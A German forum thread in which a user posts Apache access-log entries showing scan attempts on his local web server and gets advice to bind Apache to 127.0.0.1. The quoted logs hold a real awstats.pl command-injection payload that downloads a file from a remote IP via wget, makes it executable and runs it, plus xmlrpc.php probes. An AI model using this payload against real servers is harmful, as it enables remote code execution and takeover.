[Spaßbär]

Liebe Gulli-User,

ich habe einen lokalen Webserver installiert um ein paar Php Scripte zu testen, aber auch meine Datenbank zu verwalten.

Gestern habe ich in der Access.log bemerkt, dass immer wieder verschiedene ips versuchen, auf irgendwelche Dateien zuzugreifen. Hier ein Beispiel:

HTML-Code:

GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 294
IP - - [28/Dec/2005:01:25:15 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 294
IP - - [28/Dec/2005:01:25:16 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 294
IP - - [28/Dec/2005:01:25:17 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 302
IP - - [28/Dec/2005:01:25:18 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
IP - - [28/Dec/2005:01:25:19 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
IP - - [28/Dec/2005:01:25:20 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
IP - - [28/Dec/2005:01:25:21 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
IP - - [28/Dec/2005:01:25:23 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
IP - - [28/Dec/2005:01:25:24 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
IP - - [28/Dec/2005:01:25:25 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
IP - - [28/Dec/2005:01:25:26 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
IP - - [28/Dec/2005:01:25:28 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293
IP - - [28/Dec/2005:01:25:29 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293

Ich habe meinen Apache jetzt vorsichtshalber ausgeschalten. Kann ich den irgendwie so einstellen, dass man nur lokal drauf zugreifen kann, oder ihn sonst irgendwie absicheren?

Hier meine Daten:
Windows XP
Apache Server 2.0.55
PHP 5
Mysql 5.0

Vielen Dank,
Spaßbär

[vmk]

Binde den Apache nur an die lokake IP.

Was ist überhaupt Apache Server? *g*

[gordon7999]

wie wärs mit ein paar eckdaten. ich meine hast du ein paar ports freigegeben...oder port forwarding am router eingeschaltet? wenn du keine firewall und keinen router hast ist klar das bei dir ein apache für die ganze welt läuft...dafür ist er ja auch gemacht worden

[OpusDei]

Binde ihn nur an die Loopback-Schnittstelle:

Code:

Listen 127.0.0.1:80

Dann sind auch etwaige Portweiterleitungen egal. Natürlich musst du ihn dann auch am Rechner selbst über "127.0.0.1" aufrufen.

Gruß

[Spaßbär]

Zitat:

Zitat von OpusDei 

Binde ihn nur an die Loopback-Schnittstelle:

Code:

Listen 127.0.0.1:80

Dann sind auch etwaige Portweiterleitungen egal. Natürlich musst du ihn dann auch am Rechner selbst über "127.0.0.1" aufrufen.

Gruß

Vielen Dank, genau dass habe ich jetzt auch gemacht, Problem gelöst

Liebe Grüße,
Spaßbär